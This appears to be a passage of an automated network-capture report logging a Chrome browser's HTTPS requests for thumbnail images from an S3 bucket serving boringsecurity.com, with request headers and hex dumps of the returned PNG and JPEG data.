                                                                          2023-12-10 16:45:02 UTC8500INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 02 00 00 00 05 da 55 1a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 7d 05 54 54 dd f7 f6 a5 43 c2 40 14 11 0c 14 14 13 bb bb bb bb 13 15 5b b0 e8 0e 11 a5 41 1a 86 2e c5 6e 41 41 54 ba bb bb 9b 61 66 ee f9 d6 be 17 e7 45 44 a5 c5 df f7 9f 75 96 4b 11 86 3b e7 39 bb 9f bd 0f 86 dc e3 ff 6f a1 ff ad 4d c0 90 73 ec ff 2d f4 bf b5 09 18 72 89 fd bf 85 fe b7 36 e1 ff 40 8d fd eb 18 fc 1f a8 7f 7f cb 50 9f 5f ff 27 a9 b1 7f 1d 83 ff 03 f5 97 5b 80 3b c7 c0 72 f9 fb 7b fa d7 d7 bf 2d a9 0c e7 18 9a 53 14 c3 39 06 fe e9 1a 8f 5c 13 10 25 0e 77 8e a1 3b 45 e1 e4 17 ff bf 5c ff 2a a8 34 c7 28 aa 43 04 72 4b 44 de 19 c8 35 a1 c9 31 b2 cc f2
                                                                          Data Ascii: PNGIHDRUpHYs IDATx}TTC@[A.nAATafEDuK;9oMs-r6@P_'[;r{-S9\%w;E\*4(CrKD51
                                                                          2023-12-10 16:45:02 UTC9000INData Raw: c4 30 6c 78 0b 49 95 94 84 37 0f 79 ea 82 ea 52 7f 02 b5 19 d7 f9 b3 41 79 f8 f8 78 93 3f 52 56 56 46 a6 0f df 9b 7b a1 af 45 f4 f7 bf d5 c0 41 19 f4 17 c9 c8 27 e3 ed 6d 07 08 10 a4 27 50 1b e1 b8 6b 12 e2 7e 76 e5 1e e4 9f db 87 42 9a 9f 79 87 f2 1b 61 72 ce f6 6d db 48 95 4b 06 27 cb 97 37 cf 05 94 93 73 7c f1 02 79 79 d1 3d 3c e8 14 4a bd 93 53 95 a3 63 a5 a3 63 a5 93 53 95 8b 0b 24 f7 bd bd d1 ed db 4f a0 42 27 2d d9 94 1f 81 4a 88 9d 2d 8e 9e 35 0d 52 1c 2f 5e bc 40 08 05 05 7d 04 65 28 21 65 dd 0e 3b 6a f5 1d d1 fb 31 48 c5 9f ae f5 0c 9d 32 0c 01 be c1 f8 f1 a4 07 57 57 57 27 26 06 64 94 c8 77 de a8 26 19 f4 6d 0b 50 51 71 34 28 e4 c6 f4 73 27 c0 43 be 75 0b 02 21 52 03 1d 3b 7a 94 e0 42 1f 42 11 e5 b4 77 29 bf 44 f4 63 26 7a 9e 42 77 8c 44 be 59
                                                                          Data Ascii: 0lxI7yRAyx?RVVF{EA'm'Pk~vByarmHK'7s|yy=<JSccS$OB'-J-5R/^@}e(!e;j1H2WWW'&dw&mPQq4(s'Cu!R;zBBw)Dc&zBwDY
                                                                          2023-12-10 16:45:02 UTC2016INData Raw: 48 17 41 cd 83 37 8c 7d 7f 0e ca 23 43 87 96 64 e7 56 e6 15 d6 16 96 a4 c5 25 0a 0a 08 b2 b1 61 d9 61 57 3a 67 5f 80 fa 5b ad bd 65 fd f8 66 6e 62 8b 30 01 de ad 10 ba 31 51 1d b1 4b c4 62 54 69 23 9a c1 e1 5d 32 18 86 1d 5d b2 15 79 a5 75 b1 54 de a9 d2 9b 5f f6 ad ad 70 dd c8 cc a9 c3 eb b3 95 20 24 af d2 66 e4 ab 26 07 5f f0 b5 db ad 2e bf 74 df d6 49 0b 66 89 4f 90 12 1e 25 de 7f b8 88 c0 70 11 81 51 e2 03 26 8e 13 5e 30 4b 7c ef 96 49 ca 57 16 bb 5b ee 88 78 2d 5b 4f 24 4e 51 95 36 5e 08 e5 62 6a b6 12 fe db ca 79 61 ac 02 99 c9 fb f2 e2 14 aa ea 6a 0f 1d 83 e0 e8 a6 7d be d8 af 1f 07 17 17 57 64 70 28 aa 6b 44 8d b4 c0 17 af c8 3c 68 49 67 39 85 a4 06 26 95 ca d1 3d 32 4c 1f 18 3e 5d 85 56 6d fa ed cf 4f 4e d8 19 6d be 79 61 e1 89 7d d3 0e ee 98 72
                                                                          Data Ascii: HA7}#CdV%aaW:g_[efnb01QKbTi#]2]yuT_p $f&_.tIfO%pQ&^0K|IW[x-[O$NQ6^bjyaj}Wdp(kD<hIg9&=2L>]VmONmya}r


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          198192.168.2.54992852.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC417OUTGET /thumbnail_ecb7072443091085ac47d0204dd3b39d_d867d1e82c.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC377INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 36 49 7a 37 43 6c 34 2b 47 46 6c 53 36 38 59 35 39 69 33 71 2f 43 61 39 4c 63 47 5a 44 6b 32 2b 49 75 5a 59 4d 42 4f 33 4b 52 59 4c 69 62 36 6f 33 64 59 31 36 35 43 33 6a 74 6d 4f 72 36 62 39 62 52 42 72 6f 64 37 78 46 6d 34 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 36 47 39 48 54 44 46 32 31 56 41 56 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 33 30 3a 32 35 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 66 65 62 38 66 38 32 32 64 30 63 61 39 63 35 35 34 32 39 63 61 64
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 6Iz7Cl4+GFlS68Y59i3q/Ca9LcGZDk2+IuZYMBO3KRYLib6o3dY165C3jtmOr6b9bRBrod7xFm4=x-amz-request-id: 8ZZ6G9HTDF21VAVKDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Thu, 22 Sep 2022 23:30:25 GMTETag: "feb8f822d0ca9c55429cad
                                                                          2023-12-10 16:45:02 UTC8531INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 5c d4 d9 fa ff c7 04 51 41 40 ba bb 41 14 41 44 42 da a6 14 10 01 29 29 45 ec c2 ee c4 0e 14 54 94 50 24 ec 5a bb bb 5d dd d5 55 01 5b 72 9a 99 39 cf ff f5 1c 66 70 74 f5 ee de ff bd f7 a7 ae ec eb 75 76 86 1a e1 fb 7d cf e7 c9 f3 1c c6 da dc f4 56 77 05 3b 18 1e 07 43 e4 6e 3f c9 1a f7 db f3 6d b7 5f bc d8 c9 ae ac c8 17 54 88 17 3e 6f 5e cd d7 a0 f2 2f ae 81 34 2f e5 2f 76 b2 1e 3f df 76 e7 c6 93 ac f1 4e b9 3e 32 cf 05 79 8c f5 db 46 b7 62 5c 17 ec 60 6c b8 99 a1 f3 eb f3 6d 57 2b 2a 0a e0 65 e5 2e a8 ac 2c 84 8a ca 42 fa 28 79 de bc 9a af 41 c5 5f 5c 03
                                                                          Data Ascii: PNGIHDRMpHYs IDATx\QA@AADB))ETP$Z]U[r9fptuv}Vw;Cn?m_T>o^/4//v?vN>2yFb\`lmW+*e.,B(yA_\
                                                                          2023-12-10 16:45:02 UTC14383INData Raw: ca 85 44 0c e8 01 77 8f ad 47 3f 8d 2a 8f 04 34 1a f9 5d dc 0a d5 77 0a c9 e2 29 31 90 bf 7a 02 61 3e dc 43 50 e9 50 a5 1a 53 11 e8 87 ed 22 73 d2 02 49 64 5f 5b 98 39 c2 f3 13 85 43 e0 fa f5 32 11 c5 0e f1 16 a1 99 c6 d4 45 e5 95 5c f2 fb d9 2d a4 67 57 33 30 31 d2 6f 88 89 4d 6c 98 36 7d 8e 60 e1 fc 05 30 23 63 1a 4c 18 3b 46 38 7a d4 48 8e a1 81 3e fa 87 20 b5 88 8d 9d 3d b9 7e e3 36 79 f0 f0 b1 30 72 90 9b 68 5d 46 38 2a 25 60 e4 5b 71 39 17 06 fb 77 87 51 43 ba 83 8b b3 33 7f f5 ba 2d fc 88 c8 18 30 32 b5 00 a7 9e ae 64 47 7e 91 e8 dc f9 4b a4 57 0f 07 92 b5 70 24 f1 75 eb ca 7a 74 72 13 55 34 f1 df d3 14 ed a2 af 89 69 95 dc cc 71 e8 bb 11 34 d9 f8 fb 4f 49 09 11 3a 58 6a 08 27 46 ba 40 40 bf ee ec ca 97 bb 78 df 74 5c eb f7 e8 c3 e1 bf 8f 05 e7 ba
                                                                          Data Ascii: DwG?*4]w)1za>CPPS"sId_[9C2E\-gW301oMl6}`0#cL;F8zH> =~6y0rh]F8*%`[q9wQC3-02dG~KWp$uztrU4iq4OI:Xj'F@@xt\


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          199192.168.2.54993352.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC395OUTGET /thumbnail_ispeaknerd_9fc9526715.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 44 45 5a 76 69 48 6e 46 64 74 55 37 74 35 43 62 4c 65 57 4c 75 4f 2f 47 55 67 72 37 68 30 67 6a 6d 69 62 77 2f 30 4e 33 4f 56 39 62 37 62 42 69 65 51 74 4d 37 6a 34 79 6e 56 35 58 78 30 44 64 6f 50 4f 2f 5a 64 35 49 2f 4e 30 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 36 47 52 30 57 44 58 35 4b 34 36 33 57 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 31 20 4a 75 6e 20 32 30 32 33 20 30 31 3a 33 32 3a 30 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 37 32 33 62 63 33 36 62 37 64 66 62 32 61 62 30 30 62 35 33 62 63
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: DEZviHnFdtU7t5CbLeWLuO/GUgr7h0gjmibw/0N3OV9b7bBieQtM7j4ynV5Xx0DdoPO/Zd5I/N0=x-amz-request-id: 8ZZ6GR0WDX5K463WDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Wed, 21 Jun 2023 01:32:09 GMTETag: "723bc36b7dfb2ab00b53bc
                                                                          2023-12-10 16:45:02 UTC8494INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 5d 07 7c 14 c5 1a 9f bb 4b 2f 24 a4 11 48 02 69 10 7a 42 0d bd 04 42 27 10 7a 12 d2 13 7a 13 41 f1 61 af 60 43 45 7a 93 a2 d2 9b 8a 8a 88 34 05 9f bd f3 6c 60 57 d4 a7 cf 02 d2 f2 7f bf 6f e6 66 6f 76 73 97 5c 8a 86 90 cc cf f1 c8 dd ee ec ec ce 7f bf 36 5f 61 a8 6d 65 6e 45 45 45 bc cb 7f 5f bc 78 51 fb ed e8 d1 a3 e8 d4 b1 33 18 63 60 2e 0c d1 96 b6 18 63 b9 15 93 2d ab 30 d1 b2 1c 13 2d 2b 8a f5 09 96 65 98 61 d9 80 0e 6e 43 f8 79 59 99 d9 7c ac 4b 97 2e e9 ae 75 35 34 56 d5 13 a8 6e 4d 05 c0 e5 cb 97 39 28 a8 7d ff fd f7 c8 cb cb 17 40 63 0c 1e cc 07 7d 58 21
                                                                          Data Ascii: PNGIHDRMpHYs IDATx]|K/$HizBB'zzAa`CEz4l`Wofovs\6_amenEEE_xQ3c`.c-0-+eanCyY|K.u54VnM9(}@c}X!
                                                                          2023-12-10 16:45:02 UTC8779INData Raw: 2c e0 3c e8 6c de ba 8f 0c 79 d1 06 e4 58 91 2e 82 16 52 65 af 15 d7 8c 8b 74 26 13 7a 41 ef e9 27 b4 73 ea f7 dc 73 0f bf 4f 63 cc a8 fa ec 25 95 a3 8a d4 9e 75 dc 30 a7 cb 32 0e 32 59 ee 4a 3a 52 bc 37 13 d8 97 fd 23 92 c2 d2 60 76 35 61 d4 e8 91 9c a5 d2 75 3a b3 31 98 6a 59 cb 35 56 69 8f 93 9b f8 f1 6c 10 1a 35 0e c7 d9 3f cf d9 9d 83 1d c0 e9 cd 0d 77 f7 db a9 19 66 5d 5c 5c f0 c1 07 1f 68 8b ea 08 b9 a5 35 79 2e a5 a8 a2 b1 7d dc fc b1 77 fc 37 5a 50 b1 4c 87 60 0f 74 ea c2 1d 29 3c 87 86 fe 56 41 d6 dd 03 9f 7e fa a9 6e 7c f5 21 1b cb aa f7 e8 d1 43 47 ed ae e9 f2 b0 56 d4 ce 79 d0 59 9d 27 27 91 26 77 1a 9e 2e b6 ad a8 a4 e8 31 9a 66 49 2c ab f2 6a cc 16 15 db 7a 22 aa 2a 0d f1 fb f7 ef 77 48 59 8c 54 6e ee 0d d7 a2 2e 0b c7 71 c3 76 a0 04 1e cd
                                                                          Data Ascii: ,<lyX.Ret&zA'ssOc%u022YJ:R7#`v5au:1jY5Vil5?wf]\\h5y.}w7ZPL`t)<VA~n|!CGVyY''&w.1fI,jz"*wHYTn.qv


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          200192.168.2.5499323.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC631OUTGET /thumbnail_poppunk_ac3f59a852.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 6f 6e 72 6d 34 33 69 4a 6e 2f 74 4d 6a 74 38 79 2f 67 51 59 54 7a 31 68 53 56 63 67 46 7a 7a 45 76 47 30 48 73 30 56 48 6c 59 6d 73 66 4c 30 39 33 4b 74 50 58 47 76 75 41 6f 61 4b 74 35 41 4f 77 45 31 38 73 6b 4a 41 63 58 47 53 57 4f 72 66 38 77 76 38 52 62 4f 47 69 2f 4a 56 6d 79 6e 49 6c 4f 39 52 2f 33 55 66 4f 34 73 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 43 59 46 4a 56 42 31 33 4b 56 58 5a 48 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 33 20 53 65 70 20 32 30 32 32 20 30 30 3a 31 39 3a 34 34 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: onrm43iJn/tMjt8y/gQYTz1hSVcgFzzEvG0Hs0VHlYmsfL093KtPXGvuAoaKt5AOwE18skJAcXGSWOrf8wv8RbOGi/JVmynIlO9R/3UfO4s=x-amz-request-id: 8ZZCYFJVB13KVXZHDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Fri, 23 Sep 2022 00:19:44 GM
                                                                          2023-12-10 16:45:02 UTC524INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 05 06 07 04 02 08 ff c4 00 40 10 00 01 03 03 01 05 04 06 08 04 05 05 00 00 00 00 01 00 02 03 04 05 11 21 06 12 31 41 51 07 13 61 71 14 22 32 81 91 b1 23 42 52 72 a1 c1 d1 f0 15 16 33 f1 34 35 43 82 e1 53 62 63 92 a2
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("@!1AQaq"2#BRr345CSbc
                                                                          2023-12-10 16:45:02 UTC4294INData Raw: c8 6c cf 53 dd ee b3 a9 76 36 ee c6 39 dd dc 2f c3 73 ba d9 01 27 c3 cd 41 54 d2 54 53 3c b6 a2 09 62 70 e4 f6 10 b6 9e f1 78 79 0e 18 38 50 30 74 be a1 87 f5 58 1d dd 97 ba 99 97 a2 f0 b8 7e 93 c8 ef cf d9 62 59 19 e2 33 e6 8c 2d 96 58 61 78 21 f0 44 f6 f8 b0 15 0b 5f b3 76 ba b0 4b 61 f4 79 0f d6 84 ee fe 1c 14 8c 1d 32 a7 73 ad 34 65 bd c6 fe c9 8c bd 15 9d a2 f1 3c 3b d3 dd 66 9e 49 54 ed df 66 6b 28 43 a4 87 15 30 0d 72 c1 eb 01 e2 3f 45 04 06 aa cb 0d 7d 3d 44 46 68 9e 0b 47 df 82 81 92 86 78 a5 10 c8 d2 1c 52 3a 9a 6a b8 e4 86 95 c5 b3 3d 84 35 df 64 e3 42 b3 da fb 0d d2 d5 52 27 af 86 7e f5 ae de ef 86 5c d2 47 3d e5 b3 59 e9 bb 8a 60 f2 3e 92 4f 58 f9 72 4e d4 d7 53 40 08 9e 56 02 78 b7 89 f8 2a eb 31 a9 cc c6 cd e2 07 6f 65 71 a6 c2 9a d6 08 e1
                                                                          Data Ascii: lSv69/s'ATTS<bpxy8P0tX~bY3-Xax!D_vKay2s4e<;fITfk(C0r?E}=DFhGxR:j=5dBR'~\G=Y`>OXrNS@Vx*1oeq


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          201192.168.2.5499343.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC627OUTGET /thumbnail_quit_b3e92694b1.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC409INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 71 33 42 7a 71 61 54 6d 47 33 4f 5a 6d 66 4f 58 43 2b 44 6c 4b 53 2f 53 51 65 69 6c 43 33 59 6f 4a 34 2b 63 66 38 7a 38 62 79 6b 32 41 76 2f 6e 5a 51 69 48 51 30 67 6f 36 38 68 36 71 4d 6e 72 45 45 4f 6d 38 4c 41 71 34 74 30 74 4f 41 75 57 73 4e 44 55 47 72 42 37 79 4e 76 2b 41 6c 6a 5a 6a 62 61 69 35 66 44 2b 74 61 4d 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 32 4d 52 51 32 42 35 4a 44 57 31 34 59 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 32 20 53 65 70 20 32 30 32 32 20 32 33 3a 35 37 3a 35 37 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: q3BzqaTmG3OZmfOXC+DlKS/SQeilC3YoJ4+cf8z8byk2Av/nZQiHQ0go68h6qMnrEEOm8LAq4t0tOAuWsNDUGrB7yNv+AljZjbai5fD+taM=x-amz-request-id: 8ZZ2MRQ2B5JDW14YDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Thu, 22 Sep 2022 23:57:57 GM
                                                                          2023-12-10 16:45:02 UTC8501INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 07 74 54 e7 99 f7 49 1c af 1b 4d 42 80 7a ef bd 4b 33 ea bd 77 d4 91 40 05 49 48 48 a2 37 15 d4 a8 12 bd 77 9b de 3b 18 03 06 37 5c c1 c6 d8 8e 1d db 49 9c c4 29 bb 9b 6c 76 93 cd ee 26 5f d6 ff ef 3c cf cc 1d dd a9 1a 49 23 01 ce 72 ce 7b e6 32 33 9a b9 73 ef ef fe 9f fa be 77 8c b4 b6 ed 87 92 da d6 31 92 9a d6 e7 a4 b5 6d 8b 25 b5 6d 9f 4a 6a 5a 21 ad 6d fb 4e 52 db f6 9d b4 b6 0d c3 1b f4 59 fc 79 a2 47 f9 a8 11 3d 8a b7 87 fd 9d ff b8 43 a2 65 7b 14 07 31 f3 9d a4 a6 95 f8 f9 4c 5a db b6 44 5a db fa ac 94 18 ab 6d fb 21 81 36 46 52 db 6a 21 ad 6d fb 48 22
                                                                          Data Ascii: PNGIHDRMpHYs IDATxtTIMBzK3w@IHH7w;7\I)lv&_<I#r{23sw1m%mJjZ!mNRYyG=Ce{1LZDZm!6FRj!mH"
                                                                          2023-12-10 16:45:03 UTC9000INData Raw: fe f9 de 21 9c 58 5f 8b f6 9a 44 2c a9 88 43 4b 6d 1a 4e 6e 5f 8a bf 7e 7d 91 a3 ef 9a 92 64 56 5a fa 2c 0a 62 e8 77 91 cf 47 bf 9b ca 7b e1 21 be c8 cb 4e e7 da a9 93 83 1d 5c 52 4a 94 4c a9 c1 f2 6f 86 01 ce 10 33 af 06 09 9d 36 d8 c4 c9 df 99 8b 79 b9 52 4a 5e d2 3c ce e4 84 18 84 06 78 29 f9 71 0a b3 fa de 21 3e 01 54 43 fd 52 25 b0 90 d5 2f 4f 61 4b 67 2d ee 9e eb e5 6e 93 e8 c8 30 ce bd a9 76 fa d2 a0 86 46 52 b8 30 49 20 0f 02 cf cd d5 99 4d e8 df 7f 76 19 ef 5e e8 c3 f2 ea 44 6c 5d 98 8a 83 2b 72 50 93 13 80 28 3f 1b 84 7a 5a 20 33 c2 19 2b 9b 32 f1 de b9 d5 b8 7f 79 23 77 fc 92 ba 89 d5 f6 9b b7 0f 72 69 6a 5a 62 00 3e be b2 8e dd 81 99 d9 52 b8 da 4c 82 b5 e9 04 1e 94 14 ae c9 0d c6 95 83 1d 9c e6 a1 ee 15 02 95 00 23 95 fb e8 e5 ad 8a 8b 29 3b
                                                                          Data Ascii: !X_D,CKmNn_~}dVZ,bwG{!N\RJLo36yRJ^<x)q!>TCR%/OaKg-n0vFR0I Mv^Dl]+rP(?zZ 3+2y#wrijZb>RL#);
                                                                          2023-12-10 16:45:03 UTC3811INData Raw: e0 41 93 1f 47 d0 d9 58 5b c2 c2 c2 92 bb 86 a7 4e 9d aa 64 fe 15 fb 6b 27 83 ce 68 c2 04 19 74 64 5e 55 a2 d7 d1 53 9f c1 9c 1f c3 98 5f bd 80 d3 3b 85 51 ab 12 78 a8 dd 37 41 bf 1d 15 d4 8d 52 0b 2e 09 d3 f0 dc b3 cf b2 7a 58 5a 5a 2a 4c 96 26 f0 04 d0 94 00 d4 f0 3e 47 47 07 98 9b 5b c0 d8 c8 08 d1 11 12 36 89 aa 77 84 e6 1c 9c 9e 0a 27 2c 84 43 cb 80 bd f0 c2 0b bc af 3a 7d 4d 3b 3b 38 b0 79 9d c0 3e 9d b0 a2 65 3f 70 da 8e d5 48 41 f7 18 29 9c a6 74 c6 80 ef 53 0a 42 f4 df 49 a5 7c 14 4f fc 68 c7 64 5b 27 6e 01 27 87 9c 7c 22 32 89 04 1e 9d 50 b1 8a 29 a0 13 81 a7 04 a0 8a d2 d0 09 17 02 0a 2f 0f 57 c5 fd 57 0b b4 d5 57 f5 b8 97 03 95 be 26 4e 9c c0 9f ab ba 6f 76 b6 2a fb 2a 87 6e e2 84 f1 70 49 2e 92 f9 74 a2 b2 95 f2 09 1e 09 ff 6e b0 50 0e 04 9c
                                                                          Data Ascii: AGX[Ndk'htd^US_;Qx7AR.zXZZ*L&>GG[6w',C:}M;;8y>e?pHA)tSBI|Ohd['n'|"2P)/WWW&Nov**npI.tnP


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          202192.168.2.54993552.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC401OUTGET /thumbnail_Jons_Doodley_Doo_9e4a536842.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
